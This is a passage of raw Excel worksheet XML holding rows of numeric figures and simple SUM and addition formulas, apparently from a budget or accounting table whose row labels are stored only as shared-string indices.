      <c r="M32" s="3"/>
      <c r="N32" s="3"/>
      <c r="O32" s="3"/>
      <c r="P32" s="3"/>
      <c r="Q32" s="3"/>
      <c r="R32" s="3"/>
      <c r="S32" s="3"/>
      <c r="T32" s="3"/>
      <c r="U32" s="3"/>
      <c r="V32" s="3"/>
      <c r="W32" s="3">
        <f>H32+I32</f>
        <v>1623</v>
      </c>
    </row>
    <row r="33" spans="1:23" ht="15" customHeight="1">
      <c r="A33" s="30" t="s">
        <v>79</v>
      </c>
      <c r="B33" s="3">
        <v>2143</v>
      </c>
      <c r="C33" s="3">
        <f>SUM(D33:E33)</f>
        <v>0</v>
      </c>
      <c r="D33" s="3"/>
      <c r="E33" s="3"/>
      <c r="F33" s="3">
        <f>B33+C33</f>
        <v>2143</v>
      </c>
      <c r="G33" s="3" t="s">
        <v>80</v>
      </c>
      <c r="H33" s="3">
        <v>1685</v>
      </c>
      <c r="I33" s="3">
        <f>SUM(J33:V33)</f>
        <v>0</v>
      </c>
      <c r="J33" s="3"/>
      <c r="K33" s="3"/>
      <c r="L33" s="3"/>
      <c r="M33" s="3"/>
      <c r="N33" s="3"/>
      <c r="O33" s="3"/>
      <c r="P33" s="3"/>
      <c r="Q33" s="3"/>
      <c r="R33" s="3"/>
      <c r="S33" s="3"/>
      <c r="T33" s="3"/>
      <c r="U33" s="3"/>
      <c r="V33" s="3"/>
      <c r="W33" s="3">
        <f>H33+I33</f>
        <v>1685</v>
      </c>
    </row>
    <row r="34" spans="1:23" ht="15" customHeight="1">
      <c r="A34" s="30" t="s">
        <v>81</v>
      </c>
      <c r="B34" s="3">
        <v>3690</v>
      </c>
      <c r="C34" s="3"/>
      <c r="D34" s="3"/>
      <c r="E34" s="3"/>
      <c r="F34" s="3">
        <f>B34+C34</f>
        <v>3690</v>
      </c>
      <c r="G34" s="3"/>
      <c r="H34" s="3"/>
      <c r="I34" s="3"/>
      <c r="J34" s="3"/>
      <c r="K34" s="3"/>
      <c r="L34" s="3"/>
      <c r="M34" s="3"/>
      <c r="N34" s="3"/>
      <c r="O34" s="3"/>
      <c r="P34" s="3"/>
      <c r="Q34" s="3"/>
      <c r="R34" s="3"/>
      <c r="S34" s="3"/>
      <c r="T34" s="3"/>
      <c r="U34" s="3"/>
      <c r="V34" s="3"/>
      <c r="W34" s="3"/>
    </row>
    <row r="35" spans="1:23" ht="15" customHeight="1">
      <c r="A35" s="30" t="s">
        <v>82</v>
      </c>
      <c r="B35" s="3">
        <f t="shared" ref="B35" si="26">SUM(B36:B50)</f>
        <v>187611</v>
      </c>
      <c r="C35" s="3">
        <f>SUM(C36:C50)</f>
        <v>18796</v>
      </c>
      <c r="D35" s="3">
        <f>SUM(D36:D50)</f>
        <v>0</v>
      </c>
      <c r="E35" s="3">
        <f>SUM(E36:E50)</f>
        <v>18796</v>
      </c>
      <c r="F35" s="3">
        <f>SUM(F36:F50)</f>
        <v>206407</v>
      </c>
      <c r="G35" s="3"/>
      <c r="H35" s="3"/>
      <c r="I35" s="3"/>
      <c r="J35" s="3"/>
      <c r="K35" s="3"/>
      <c r="L35" s="3"/>
      <c r="M35" s="3"/>
      <c r="N35" s="3"/>
      <c r="O35" s="3"/>
      <c r="P35" s="3"/>
      <c r="Q35" s="3"/>
      <c r="R35" s="3"/>
      <c r="S35" s="3"/>
      <c r="T35" s="3"/>
      <c r="U35" s="3"/>
      <c r="V35" s="3"/>
      <c r="W35" s="3"/>
    </row>
    <row r="36" spans="1:23" ht="15" customHeight="1">
      <c r="A36" s="30" t="s">
        <v>83</v>
      </c>
      <c r="B36" s="3">
        <v>37389</v>
      </c>
      <c r="C36" s="3"/>
      <c r="D36" s="3"/>
      <c r="E36" s="3">
        <f>C36</f>
        <v>0</v>
      </c>
      <c r="F36" s="3">
        <f t="shared" ref="F36" si="27">B36+C36</f>
        <v>37389</v>
      </c>
      <c r="G36" s="3"/>
      <c r="H36" s="3"/>
      <c r="I36" s="3"/>
      <c r="J36" s="3"/>
      <c r="K36" s="3"/>
      <c r="L36" s="3"/>
      <c r="M36" s="3"/>
      <c r="N36" s="3"/>
      <c r="O36" s="3"/>
      <c r="P36" s="3"/>
      <c r="Q36" s="3"/>
      <c r="R36" s="3"/>
      <c r="S36" s="3"/>
      <c r="T36" s="3"/>
      <c r="U36" s="3"/>
      <c r="V36" s="3"/>
      <c r="W36" s="3"/>
    </row>
    <row r="37" spans="1:23" ht="15" customHeight="1">
      <c r="A37" s="30" t="s">
        <v>84</v>
      </c>
      <c r="B37" s="3">
        <v>1254</v>
      </c>
      <c r="C37" s="3">
        <f>1276+400</f>
        <v>1676</v>
      </c>
      <c r="D37" s="3"/>
      <c r="E37" s="3">
        <f t="shared" ref="E37" si="28">C37</f>
        <v>1676</v>
      </c>
      <c r="F37" s="3">
        <f>B37+C37</f>
        <v>2930</v>
      </c>
      <c r="G37" s="3"/>
      <c r="H37" s="3"/>
      <c r="I37" s="3"/>
      <c r="J37" s="3"/>
      <c r="K37" s="3"/>
      <c r="L37" s="3"/>
      <c r="M37" s="3"/>
      <c r="N37" s="3"/>
      <c r="O37" s="3"/>
      <c r="P37" s="3"/>
      <c r="Q37" s="3"/>
      <c r="R37" s="3"/>
      <c r="S37" s="3"/>
      <c r="T37" s="3"/>
      <c r="U37" s="3"/>
      <c r="V37" s="3"/>
      <c r="W37" s="3"/>
    </row>
    <row r="38" spans="1:23" ht="15" customHeight="1">
      <c r="A38" s="30" t="s">
        <v>85</v>
      </c>
      <c r="B38" s="3">
        <v>13280</v>
      </c>
      <c r="C38" s="3"/>
      <c r="D38" s="3"/>
      <c r="E38" s="3">
        <f t="shared" ref="E38:E50" si="29">C38</f>
        <v>0</v>
      </c>
      <c r="F38" s="3">
        <f>B38+C38</f>
        <v>13280</v>
      </c>
      <c r="G38" s="3"/>
      <c r="H38" s="3"/>
      <c r="I38" s="3"/>
      <c r="J38" s="3"/>
      <c r="K38" s="3"/>
      <c r="L38" s="3"/>
      <c r="M38" s="3"/>
      <c r="N38" s="3"/>
      <c r="O38" s="3"/>
      <c r="P38" s="3"/>
      <c r="Q38" s="3"/>
      <c r="R38" s="3"/>
      <c r="S38" s="3"/>
      <c r="T38" s="3"/>
      <c r="U38" s="3"/>
      <c r="V38" s="3"/>
      <c r="W38" s="3"/>
    </row>
    <row r="39" spans="1:23" ht="15" customHeight="1">
      <c r="A39" s="30" t="s">
        <v>86</v>
      </c>
      <c r="B39" s="3">
        <v>2453</v>
      </c>
      <c r="C39" s="3"/>
      <c r="D39" s="3"/>
      <c r="E39" s="3">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="F39" s="3">
        <f>B39+C39</f>
        <v>2453</v>
      </c>
      <c r="G39" s="5" t="s">
        <v>87</v>
      </c>
      <c r="H39" s="5">
        <v>5170</v>
      </c>
      <c r="I39" s="5">
        <f>SUM(J39:V39)</f>
        <v>0</v>
      </c>
      <c r="J39" s="5"/>
      <c r="K39" s="5"/>
      <c r="L39" s="5"/>
      <c r="M39" s="5"/>
      <c r="N39" s="5"/>
      <c r="O39" s="5"/>
      <c r="P39" s="5"/>
      <c r="Q39" s="5"/>
      <c r="R39" s="5"/>
      <c r="S39" s="5"/>
      <c r="T39" s="5"/>
      <c r="U39" s="5"/>
      <c r="V39" s="5"/>
      <c r="W39" s="5">
        <f>H39+I39</f>
        <v>5170</v>
      </c>
    </row>
    <row r="40" spans="1:23" ht="15" customHeight="1">
      <c r="A40" s="30" t="s">
        <v>88</v>
      </c>
      <c r="B40" s="3">
        <v>16952</v>
      </c>
      <c r="C40" s="3">
        <v>4238</v>
      </c>
      <c r="D40" s="3"/>
      <c r="E40" s="3">
        <f t="shared" si="29"/>
        <v>4238</v>
      </c>
      <c r="F40" s="3">
        <f t="shared" ref="F40" si="30">B40+C40</f>
        <v>21190</v>
      </c>
      <c r="G40" s="5"/>
      <c r="H40" s="5"/>
      <c r="I40" s="5"/>
      <c r="J40" s="5"/>
      <c r="K40" s="5"/>
      <c r="L40" s="5"/>
      <c r="M40" s="5"/>
      <c r="N40" s="5"/>
      <c r="O40" s="5"/>
      <c r="P40" s="5"/>
      <c r="Q40" s="5"/>
      <c r="R40" s="5"/>
      <c r="S40" s="5"/>
      <c r="T40" s="5"/>
      <c r="U40" s="5"/>
      <c r="V40" s="5"/>
      <c r="W40" s="5"/>
    </row>
    <row r="41" spans="1:23" ht="15" customHeight="1">
      <c r="A41" s="30" t="s">
        <v>89</v>
      </c>
      <c r="B41" s="3">
        <v>3286</v>
      </c>
      <c r="C41" s="3"/>
      <c r="D41" s="3"/>
      <c r="E41" s="3">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="F41" s="3">
        <f t="shared" ref="F41:F50" si="31">B41+C41</f>
        <v>3286</v>
      </c>
      <c r="G41" s="5" t="s">
        <v>90</v>
      </c>
      <c r="H41" s="5"/>
      <c r="I41" s="5"/>
      <c r="J41" s="5"/>
      <c r="K41" s="5"/>
      <c r="L41" s="5"/>
      <c r="M41" s="5"/>
      <c r="N41" s="5"/>
      <c r="O41" s="5"/>
      <c r="P41" s="5"/>
      <c r="Q41" s="5"/>
      <c r="R41" s="5"/>
      <c r="S41" s="5"/>
      <c r="T41" s="5"/>
      <c r="U41" s="5"/>
      <c r="V41" s="5"/>
      <c r="W41" s="5">
        <f>F74-W28-W29-W39</f>
        <v>0.32499999995343387</v>
      </c>
    </row>
    <row r="42" spans="1:23" ht="15" customHeight="1">
      <c r="A42" s="30" t="s">
        <v>91</v>
      </c>
      <c r="B42" s="3">
        <v>819</v>
      </c>
      <c r="C42" s="3">
        <v>1132</v>
      </c>
      <c r="D42" s="3"/>
      <c r="E42" s="3">
        <f t="shared" si="29"/>
        <v>1132</v>
      </c>
      <c r="F42" s="3">
        <f t="shared" si="31"/>
        <v>1951</v>
      </c>
      <c r="G42" s="5"/>
      <c r="H42" s="5"/>
      <c r="I42" s="5"/>
      <c r="J42" s="5"/>
      <c r="K42" s="5"/>
      <c r="L42" s="5"/>
      <c r="M42" s="5"/>
      <c r="N42" s="5"/>
      <c r="O42" s="5"/>
      <c r="P42" s="5"/>
      <c r="Q42" s="5"/>
      <c r="R42" s="5"/>
      <c r="S42" s="5"/>
      <c r="T42" s="5"/>
      <c r="U42" s="5"/>
      <c r="V42" s="5"/>
      <c r="W42" s="5"/>
    </row>
    <row r="43" spans="1:23" ht="15" customHeight="1">
      <c r="A43" s="30" t="s">
        <v>92</v>
      </c>
      <c r="B43" s="3">
        <v>11882</v>
      </c>
      <c r="C43" s="3">
        <v>940</v>
      </c>
      <c r="D43" s="3"/>
      <c r="E43" s="3">
        <f t="shared" si="29"/>
        <v>940</v>
      </c>
      <c r="F43" s="3">
        <f t="shared" si="31"/>
        <v>12822</v>
      </c>
      <c r="G43" s="3"/>
      <c r="H43" s="3"/>
      <c r="I43" s="3"/>
      <c r="J43" s="3"/>
      <c r="K43" s="3"/>
      <c r="L43" s="3"/>
      <c r="M43" s="3"/>
      <c r="N43" s="3"/>
      <c r="O43" s="3"/>
      <c r="P43" s="3"/>
      <c r="Q43" s="3"/>
      <c r="R43" s="3"/>
      <c r="S43" s="3"/>
      <c r="T43" s="3"/>
      <c r="U43" s="3"/>
      <c r="V43" s="3"/>
      <c r="W43" s="3"/>
    </row>
    <row r="44" spans="1:23" ht="15" customHeight="1">
      <c r="A44" s="30" t="s">
        <v>93</v>
      </c>
      <c r="B44" s="3">
        <v>39442</v>
      </c>
      <c r="C44" s="3">
        <v>8234</v>
      </c>
      <c r="D44" s="3"/>
      <c r="E44" s="3">
        <f t="shared" si="29"/>
        <v>8234</v>
      </c>
      <c r="F44" s="3">
        <f t="shared" si="31"/>
        <v>47676</v>
      </c>
      <c r="G44" s="3"/>
      <c r="H44" s="3"/>
      <c r="I44" s="3"/>
      <c r="J44" s="3"/>
      <c r="K44" s="3"/>
      <c r="L44" s="3"/>
      <c r="M44" s="3"/>
      <c r="N44" s="3"/>
      <c r="O44" s="3"/>
      <c r="P44" s="3"/>
      <c r="Q44" s="3"/>
      <c r="R44" s="3"/>
      <c r="S44" s="3"/>
      <c r="T44" s="3"/>
      <c r="U44" s="3"/>
      <c r="V44" s="3"/>
      <c r="W44" s="3"/>
    </row>
    <row r="45" spans="1:23" ht="15" customHeight="1">
      <c r="A45" s="30" t="s">
        <v>94</v>
      </c>
      <c r="B45" s="3">
        <v>29497</v>
      </c>
      <c r="C45" s="3">
        <v>-477</v>
      </c>
      <c r="D45" s="3"/>
      <c r="E45" s="3">
        <f t="shared" si="29"/>
        <v>-477</v>
      </c>
      <c r="F45" s="3">
        <f t="shared" si="31"/>
        <v>29020</v>
      </c>
      <c r="G45" s="3"/>
      <c r="H45" s="3"/>
      <c r="I45" s="3"/>
      <c r="J45" s="3"/>
      <c r="K45" s="3"/>
      <c r="L45" s="3"/>
      <c r="M45" s="3"/>
      <c r="N45" s="3"/>
      <c r="O45" s="3"/>
      <c r="P45" s="3"/>
      <c r="Q45" s="3"/>
      <c r="R45" s="3"/>
      <c r="S45" s="3"/>
      <c r="T45" s="3"/>
      <c r="U45" s="3"/>
      <c r="V45" s="3"/>
      <c r="W45" s="3"/>
    </row>
    <row r="46" spans="1:23" ht="15" customHeight="1">
      <c r="A46" s="30" t="s">
        <v>95</v>
      </c>
      <c r="B46" s="3">
        <v>1810</v>
      </c>
      <c r="C46" s="3">
        <v>1577</v>
      </c>
      <c r="D46" s="3"/>
      <c r="E46" s="3">
        <f t="shared" si="29"/>
        <v>1577</v>
      </c>
      <c r="F46" s="3">
        <f t="shared" si="31"/>
        <v>3387</v>
      </c>
      <c r="G46" s="3"/>
      <c r="H46" s="3"/>
      <c r="I46" s="3"/>
      <c r="J46" s="3"/>
      <c r="K46" s="3"/>
      <c r="L46" s="3"/>
      <c r="M46" s="3"/>
      <c r="N46" s="3"/>
      <c r="O46" s="3"/>
      <c r="P46" s="3"/>
      <c r="Q46" s="3"/>
      <c r="R46" s="3"/>
      <c r="S46" s="3"/>
      <c r="T46" s="3"/>
      <c r="U46" s="3"/>
      <c r="V46" s="3"/>
      <c r="W46" s="3"/>
    </row>
    <row r="47" spans="1:23" ht="15" customHeight="1">
      <c r="A47" s="30" t="s">
        <v>96</v>
      </c>
      <c r="B47" s="3">
        <v>3322</v>
      </c>
      <c r="C47" s="3">
        <v>-95</v>
      </c>
      <c r="D47" s="3"/>
      <c r="E47" s="3">
        <f t="shared" si="29"/>
        <v>-95</v>
      </c>
      <c r="F47" s="3">
        <f t="shared" si="31"/>
        <v>3227</v>
      </c>
      <c r="G47" s="3"/>
      <c r="H47" s="3"/>
      <c r="I47" s="3"/>
      <c r="J47" s="3"/>
      <c r="K47" s="3"/>
      <c r="L47" s="3"/>
      <c r="M47" s="3"/>
      <c r="N47" s="3"/>
      <c r="O47" s="3"/>
      <c r="P47" s="3"/>
      <c r="Q47" s="3"/>
      <c r="R47" s="3"/>
      <c r="S47" s="3"/>
      <c r="T47" s="3"/>
      <c r="U47" s="3"/>
      <c r="V47" s="3"/>
      <c r="W47" s="3"/>
    </row>
    <row r="48" spans="1:23" ht="15" customHeight="1">
      <c r="A48" s="30" t="s">
        <v>97</v>
      </c>
      <c r="B48" s="3">
        <v>2801</v>
      </c>
      <c r="C48" s="3"/>
      <c r="D48" s="3"/>
      <c r="E48" s="3">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="F48" s="3">
        <f t="shared" si="31"/>
        <v>2801</v>
      </c>
      <c r="G48" s="3"/>
      <c r="H48" s="3"/>
      <c r="I48" s="3"/>
      <c r="J48" s="3"/>
      <c r="K48" s="3"/>
      <c r="L48" s="3"/>
      <c r="M48" s="3"/>
      <c r="N48" s="3"/>
      <c r="O48" s="3"/>
      <c r="P48" s="3"/>
      <c r="Q48" s="3"/>
      <c r="R48" s="3"/>
      <c r="S48" s="3"/>
      <c r="T48" s="3"/>
      <c r="U48" s="3"/>
      <c r="V48" s="3"/>
      <c r="W48" s="3"/>
    </row>
    <row r="49" spans="1:23" ht="15" customHeight="1">
      <c r="A49" s="30" t="s">
        <v>98</v>
      </c>
      <c r="B49" s="3">
        <v>20287</v>
      </c>
      <c r="C49" s="3"/>
      <c r="D49" s="3"/>
      <c r="E49" s="3">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="F49" s="3">
        <f t="shared" si="31"/>
        <v>20287</v>
      </c>
      <c r="G49" s="3"/>
      <c r="H49" s="3"/>
      <c r="I49" s="3"/>
      <c r="J49" s="3"/>
      <c r="K49" s="3"/>
      <c r="L49" s="3"/>
      <c r="M49" s="3"/>
      <c r="N49" s="3"/>
      <c r="O49" s="3"/>
      <c r="P49" s="3"/>
      <c r="Q49" s="3"/>
      <c r="R49" s="3"/>
      <c r="S49" s="3"/>
      <c r="T49" s="3"/>
      <c r="U49" s="3"/>
      <c r="V49" s="3"/>
      <c r="W49" s="3"/>
    </row>
    <row r="50" spans="1:23" ht="15" customHeight="1">
      <c r="A50" s="30" t="s">
        <v>99</v>
      </c>
      <c r="B50" s="3">
        <v>3137</v>
      </c>
      <c r="C50" s="3">
        <v>1571</v>
      </c>
      <c r="D50" s="3"/>
      <c r="E50" s="3">
        <f t="shared" si="29"/>
        <v>1571</v>
      </c>
      <c r="F50" s="3">
        <f t="shared" si="31"/>
        <v>4708</v>
      </c>
      <c r="G50" s="3"/>
      <c r="H50" s="3"/>
      <c r="I50" s="3"/>
      <c r="J50" s="3"/>
      <c r="K50" s="3"/>
      <c r="L50" s="3"/>
      <c r="M50" s="3"/>
      <c r="N50" s="3"/>
      <c r="O50" s="3"/>
      <c r="P50" s="3"/>
      <c r="Q50" s="3"/>
      <c r="R50" s="3"/>
      <c r="S50" s="3"/>
      <c r="T50" s="3"/>
      <c r="U50" s="3"/>
      <c r="V50" s="3"/>
      <c r="W50" s="3"/>
    </row>
    <row r="51" spans="1:23" ht="19.5" customHeight="1">
      <c r="A51" s="30" t="s">
        <v>100</v>
      </c>
      <c r="B51" s="3">
        <f t="shared" ref="B51" si="32">SUM(B52:B69)</f>
        <v>88000</v>
      </c>
      <c r="C51" s="3">
        <f>SUM(C52:C69)</f>
        <v>0</v>
      </c>
      <c r="D51" s="3">
        <f>SUM(D52:D69)</f>
        <v>0</v>
      </c>
      <c r="E51" s="3">
        <f>SUM(E52:E69)</f>
        <v>0</v>
      </c>
      <c r="F51" s="3">
        <f>SUM(F52:F69)</f>
        <v>88000</v>
      </c>
      <c r="G51" s="3"/>
      <c r="H51" s="3"/>
      <c r="I51" s="3"/>
      <c r="J51" s="3"/>
      <c r="K51" s="3"/>
      <c r="L51" s="3"/>
      <c r="M51" s="3"/>
      <c r="N51" s="3"/>
      <c r="O51" s="3"/>
      <c r="P51" s="3"/>
      <c r="Q51" s="3"/>
      <c r="R51" s="3"/>
      <c r="S51" s="3"/>
      <c r="T51" s="3"/>
      <c r="U51" s="3"/>
      <c r="V51" s="3"/>
      <c r="W51" s="3"/>
    </row>
    <row r="52" spans="1:23" ht="15" hidden="1" customHeight="1">
      <c r="A52" s="3" t="s">
        <v>101</v>
      </c>
      <c r="B52" s="3">
        <v>758</v>
      </c>
      <c r="C52" s="3">
        <v>-520</v>
      </c>
      <c r="D52" s="3"/>
      <c r="E52" s="3">
        <f>C52</f>
        <v>-520</v>
      </c>
      <c r="F52" s="3">
        <f t="shared" ref="F52" si="33">B52+C52</f>
        <v>238</v>
      </c>
      <c r="G52" s="3"/>
      <c r="H52" s="3"/>
      <c r="I52" s="3"/>
      <c r="J52" s="3"/>
      <c r="K52" s="3"/>
      <c r="L52" s="3"/>
      <c r="M52" s="3"/>
      <c r="N52" s="3"/>
      <c r="O52" s="3"/>
      <c r="P52" s="3"/>
      <c r="Q52" s="3"/>
      <c r="R52" s="3"/>
      <c r="S52" s="3"/>
      <c r="T52" s="3"/>
      <c r="U52" s="3"/>
      <c r="V52" s="3"/>
      <c r="W52" s="3"/>
    </row>
    <row r="53" spans="1:23" ht="15" hidden="1" customHeight="1">
      <c r="A53" s="3" t="s">
        <v>102</v>
      </c>
      <c r="B53" s="3">
        <v>1745</v>
      </c>
      <c r="C53" s="3">
        <v>-685</v>
      </c>
      <c r="D53" s="3"/>
      <c r="E53" s="3">
        <f t="shared" ref="E53" si="34">C53</f>
        <v>-685</v>
      </c>
      <c r="F53" s="3">
        <f t="shared" ref="F53:F73" si="35">B53+C53</f>
        <v>1060</v>
      </c>
      <c r="G53" s="3"/>
      <c r="H53" s="3"/>
      <c r="I53" s="3"/>
      <c r="J53" s="3"/>
      <c r="K53" s="3"/>
      <c r="L53" s="3"/>
      <c r="M53" s="3"/>
      <c r="N53" s="3"/>
      <c r="O53" s="3"/>
      <c r="P53" s="3"/>
      <c r="Q53" s="3"/>
      <c r="R53" s="3"/>
      <c r="S53" s="3"/>
      <c r="T53" s="3"/>
      <c r="U53" s="3"/>
      <c r="V53" s="3"/>
      <c r="W53" s="3"/>
    </row>
    <row r="54" spans="1:23" ht="15" hidden="1" customHeight="1">
      <c r="A54" s="3" t="s">
        <v>103</v>
      </c>
      <c r="B54" s="3">
        <v>7400</v>
      </c>
      <c r="C54" s="3">
        <v>-344</v>
      </c>
      <c r="D54" s="3"/>
      <c r="E54" s="3">
        <f t="shared" ref="E54:E70" si="36">C54</f>
        <v>-344</v>
      </c>
      <c r="F54" s="3">
        <f t="shared" si="35"/>
        <v>7056</v>
      </c>
      <c r="G54" s="3"/>
      <c r="H54" s="3"/>
      <c r="I54" s="3"/>
      <c r="J54" s="3"/>
      <c r="K54" s="3"/>
      <c r="L54" s="3"/>
      <c r="M54" s="3"/>
      <c r="N54" s="3"/>
      <c r="O54" s="3"/>
      <c r="P54" s="3"/>
      <c r="Q54" s="3"/>
      <c r="R54" s="3"/>
      <c r="S54" s="3"/>
      <c r="T54" s="3"/>
      <c r="U54" s="3"/>
      <c r="V54" s="3"/>
      <c r="W54" s="3"/>
    </row>
    <row r="55" spans="1:23" ht="15" hidden="1" customHeight="1">
      <c r="A55" s="3" t="s">
        <v>104</v>
      </c>
      <c r="B55" s="3">
        <v>100</v>
      </c>
      <c r="C55" s="3"/>
      <c r="D55" s="3"/>
      <c r="E55" s="3">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="F55" s="3">
        <f t="shared" si="35"/>
        <v>100</v>
      </c>
      <c r="G55" s="3"/>
      <c r="H55" s="3"/>
      <c r="I55" s="3"/>
      <c r="J55" s="3"/>
      <c r="K55" s="3"/>
      <c r="L55" s="3"/>
      <c r="M55" s="3"/>
      <c r="N55" s="3"/>
      <c r="O55" s="3"/>
      <c r="P55" s="3"/>
      <c r="Q55" s="3"/>
      <c r="R55" s="3"/>
      <c r="S55" s="3"/>
      <c r="T55" s="3"/>
      <c r="U55" s="3"/>
      <c r="V55" s="3"/>
      <c r="W55" s="3"/>
    </row>
    <row r="56" spans="1:23" ht="15" hidden="1" customHeight="1">
      <c r="A56" s="3" t="s">
        <v>105</v>
      </c>
      <c r="B56" s="3">
        <v>796</v>
      </c>
      <c r="C56" s="3">
        <v>810</v>
      </c>
      <c r="D56" s="3"/>
      <c r="E56" s="3">
        <f t="shared" si="36"/>
        <v>810</v>
      </c>
      <c r="F56" s="3">
        <f t="shared" si="35"/>
        <v>1606</v>
      </c>
      <c r="G56" s="3"/>
      <c r="H56" s="3"/>
      <c r="I56" s="3"/>
      <c r="J56" s="3"/>
      <c r="K56" s="3"/>
      <c r="L56" s="3"/>
      <c r="M56" s="3"/>
      <c r="N56" s="3"/>
      <c r="O56" s="3"/>
      <c r="P56" s="3"/>
      <c r="Q56" s="3"/>
      <c r="R56" s="3"/>
      <c r="S56" s="3"/>
      <c r="T56" s="3"/>
      <c r="U56" s="3"/>
      <c r="V56" s="3"/>
      <c r="W56" s="3"/>
    </row>
    <row r="57" spans="1:23" ht="15" hidden="1" customHeight="1">
      <c r="A57" s="3" t="s">
        <v>106</v>
      </c>
      <c r="B57" s="3">
        <v>16806</v>
      </c>
      <c r="C57" s="3"/>
      <c r="D57" s="3"/>
      <c r="E57" s="3">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="F57" s="3">
        <f t="shared" si="35"/>
        <v>16806</v>
      </c>
      <c r="G57" s="3"/>
      <c r="H57" s="3"/>
      <c r="I57" s="3"/>
      <c r="J57" s="3"/>
      <c r="K57" s="3"/>
      <c r="L57" s="3"/>
      <c r="M57" s="3"/>
      <c r="N57" s="3"/>
      <c r="O57" s="3"/>
      <c r="P57" s="3"/>
      <c r="Q57" s="3"/>
      <c r="R57" s="3"/>
      <c r="S57" s="3"/>
      <c r="T57" s="3"/>
      <c r="U57" s="3"/>
      <c r="V57" s="3"/>
      <c r="W57" s="3"/>
    </row>
    <row r="58" spans="1:23" ht="15" hidden="1" customHeight="1">
      <c r="A58" s="3" t="s">
        <v>107</v>
      </c>
      <c r="B58" s="3">
        <v>7743</v>
      </c>
      <c r="C58" s="3">
        <v>3982</v>
      </c>
      <c r="D58" s="3"/>
      <c r="E58" s="3">
        <f t="shared" si="36"/>
        <v>3982</v>
      </c>
      <c r="F58" s="3">
        <f t="shared" si="35"/>
        <v>11725</v>
      </c>
      <c r="G58" s="3"/>
      <c r="H58" s="3"/>
      <c r="I58" s="3"/>
      <c r="J58" s="3"/>
      <c r="K58" s="3"/>
      <c r="L58" s="3"/>
      <c r="M58" s="3"/>
      <c r="N58" s="3"/>
      <c r="O58" s="3"/>
      <c r="P58" s="3"/>
      <c r="Q58" s="3"/>
      <c r="R58" s="3"/>
      <c r="S58" s="3"/>
      <c r="T58" s="3"/>
      <c r="U58" s="3"/>
      <c r="V58" s="3"/>
      <c r="W58" s="3"/>
    </row>
    <row r="59" spans="1:23" ht="15" hidden="1" customHeight="1">
      <c r="A59" s="3" t="s">
        <v>108</v>
      </c>
      <c r="B59" s="3">
        <v>8594</v>
      </c>
      <c r="C59" s="3">
        <f>-4248+1000</f>
        <v>-3248</v>
      </c>
      <c r="D59" s="3"/>
      <c r="E59" s="3">
        <f t="shared" si="36"/>
        <v>-3248</v>
      </c>
      <c r="F59" s="3">
        <f t="shared" si="35"/>
        <v>5346</v>
      </c>
      <c r="G59" s="3"/>
      <c r="H59" s="3"/>
      <c r="I59" s="3"/>
      <c r="J59" s="3"/>
      <c r="K59" s="3"/>
      <c r="L59" s="3"/>
      <c r="M59" s="3"/>
      <c r="N59" s="3"/>
      <c r="O59" s="3"/>
      <c r="P59" s="3"/>
      <c r="Q59" s="3"/>
      <c r="R59" s="3"/>
      <c r="S59" s="3"/>
      <c r="T59" s="3"/>
      <c r="U59" s="3"/>
      <c r="V59" s="3"/>
      <c r="W59" s="3"/>
    </row>
    <row r="60" spans="1:23" ht="15" hidden="1" customHeight="1">
      <c r="A60" s="3" t="s">
        <v>109</v>
      </c>
      <c r="B60" s="3">
        <v>160</v>
      </c>
      <c r="C60" s="3">
        <v>2766</v>
      </c>
      <c r="D60" s="3"/>
      <c r="E60" s="3">
        <f t="shared" si="36"/>
        <v>2766</v>
      </c>
      <c r="F60" s="3">
        <f t="shared" si="35"/>
        <v>2926</v>
      </c>
      <c r="G60" s="3"/>
      <c r="H60" s="3"/>
      <c r="I60" s="3"/>
      <c r="J60" s="3"/>
      <c r="K60" s="3"/>
      <c r="L60" s="3"/>
      <c r="M60" s="3"/>
      <c r="N60" s="3"/>
      <c r="O60" s="3"/>
      <c r="P60" s="3"/>
      <c r="Q60" s="3"/>
      <c r="R60" s="3"/>
      <c r="S60" s="3"/>
      <c r="T60" s="3"/>
      <c r="U60" s="3"/>
      <c r="V60" s="3"/>
      <c r="W60" s="3"/>
    </row>
    <row r="61" spans="1:23" ht="15" hidden="1" customHeight="1">
      <c r="A61" s="3" t="s">
        <v>110</v>
      </c>
      <c r="B61" s="3">
        <v>29097</v>
      </c>
      <c r="C61" s="3">
        <f>-6827+3000</f>
        <v>-3827</v>
      </c>
      <c r="D61" s="3"/>
      <c r="E61" s="3">
        <f t="shared" si="36"/>
        <v>-3827</v>
      </c>
      <c r="F61" s="3">
        <f t="shared" si="35"/>
        <v>25270</v>
      </c>
      <c r="G61" s="3"/>
      <c r="H61" s="3"/>
      <c r="I61" s="3"/>
      <c r="J61" s="3"/>
      <c r="K61" s="3"/>
      <c r="L61" s="3"/>
      <c r="M61" s="3"/>
      <c r="N61" s="3"/>
      <c r="O61" s="3"/>
      <c r="P61" s="3"/>
      <c r="Q61" s="3"/>
      <c r="R61" s="3"/>
      <c r="S61" s="3"/>
      <c r="T61" s="3"/>
      <c r="U61" s="3"/>
      <c r="V61" s="3"/>
      <c r="W61" s="3"/>
    </row>
    <row r="62" spans="1:23" ht="15" hidden="1" customHeight="1">
      <c r="A62" s="3" t="s">
        <v>111</v>
      </c>
      <c r="B62" s="3">
        <v>3960</v>
      </c>
      <c r="C62" s="3">
        <v>-2320</v>
      </c>
      <c r="D62" s="3"/>
      <c r="E62" s="3">
        <f t="shared" si="36"/>
        <v>-2320</v>
      </c>
      <c r="F62" s="3">
        <f t="shared" si="35"/>
        <v>1640</v>
      </c>
      <c r="G62" s="3"/>
      <c r="H62" s="3"/>
      <c r="I62" s="3"/>
      <c r="J62" s="3"/>
      <c r="K62" s="3"/>
      <c r="L62" s="3"/>
      <c r="M62" s="3"/>
      <c r="N62" s="3"/>
      <c r="O62" s="3"/>
      <c r="P62" s="3"/>
      <c r="Q62" s="3"/>
      <c r="R62" s="3"/>
      <c r="S62" s="3"/>
      <c r="T62" s="3"/>
      <c r="U62" s="3"/>
      <c r="V62" s="3"/>
      <c r="W62" s="3"/>
    </row>
    <row r="63" spans="1:23" ht="15" hidden="1" customHeight="1">
      <c r="A63" s="3" t="s">
        <v>112</v>
      </c>
      <c r="B63" s="3">
        <v>525</v>
      </c>
